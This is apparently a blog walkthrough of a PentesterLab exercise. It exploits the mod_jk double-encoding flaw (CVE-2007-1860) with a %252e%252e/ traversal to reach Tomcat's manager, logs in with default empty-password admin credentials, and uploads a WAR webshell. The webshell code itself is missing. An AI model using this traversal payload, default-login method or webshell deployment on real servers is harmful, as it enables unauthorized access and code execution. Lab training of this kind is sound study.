By means of these seven considerations I can forecast victory or defeat. —– The Art of War
This course details the exploitation of a vulnerability in mod_jk and how by using this issue it is possible to access the administration interface of a Tomcat server (Tomcat’s manager). Then using this access, we will see how an attacker can use default credentials to log in as administrator and use this access to gain code execution on the server. —Pentesterlab
Detail Assessment and Planning
- Port scan to identify opened ports, running services and services version. —– Nmap
- Check http headers. —– NC
- Exploit and upload webshell. —- Firebug
Weaknesses and Strengths
Used Nmap to idenfity opened ports. TCP port 80 is opened and Apache service is running on it.
By checking the application HTTP headers with nc, I can also get Apache service version.
First of all, we need to figure out the architecture of Tomcat and Apache. Read here
If we try to visit a non-exist page, we will receive 404 error like that:
Based on the result, we know the http request is processed by Apache.
If we try to visit page like 192.168.79.168/examples/jsp/test404, we will get the 404 error like:
Then we know that the http request is processed by Tomcat through Apache.
Tomcat Manager is available at the following URI: /manager/html and is, most of the time, protected by a password. The CVE-2007-1860 vulnerability is described advisory
If you provide this %252e to a vulnerable modjk, it will perform a first decoding and send the value %2e to Tomcat. Tomcat will then perform a second decoding to get the value .. If you use %252e%252e, you will then be able to send .. to Tomcat. If you try to send .. directly to Apache, it will not forward the request to Tomcat unless the path resolve to a path configured to be forwarded to Tomcat (using
Now we know how to access the /manager/html, (Sometimes you may need to repeat several times %252e%252e/)
The credentials are one of the default ones. In this exerciese, the admin didn’t change the credentials. The user name is admin and password is empty. Once we get it, we are able to get acces to the Tomcat Manager.
Now we need to create a webshell and upload it to the Tomcat.
Deploy a webshell
webshell (from pentesterlab, you may generate it using msfvenom)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
now we have to pack the webshell
1 2 3 4 5
webshell.war is ready to fire.
We can use the form to upload war file:
However, it will give you a 404 page since the deployment url does not use the double -encoding trick to gain access to get the manager. So we have to use firebug to give the form right location.
change the location to :
After successful uploading webshell, it will show in the Tomcat manager:
now enjoy the webshell by accessing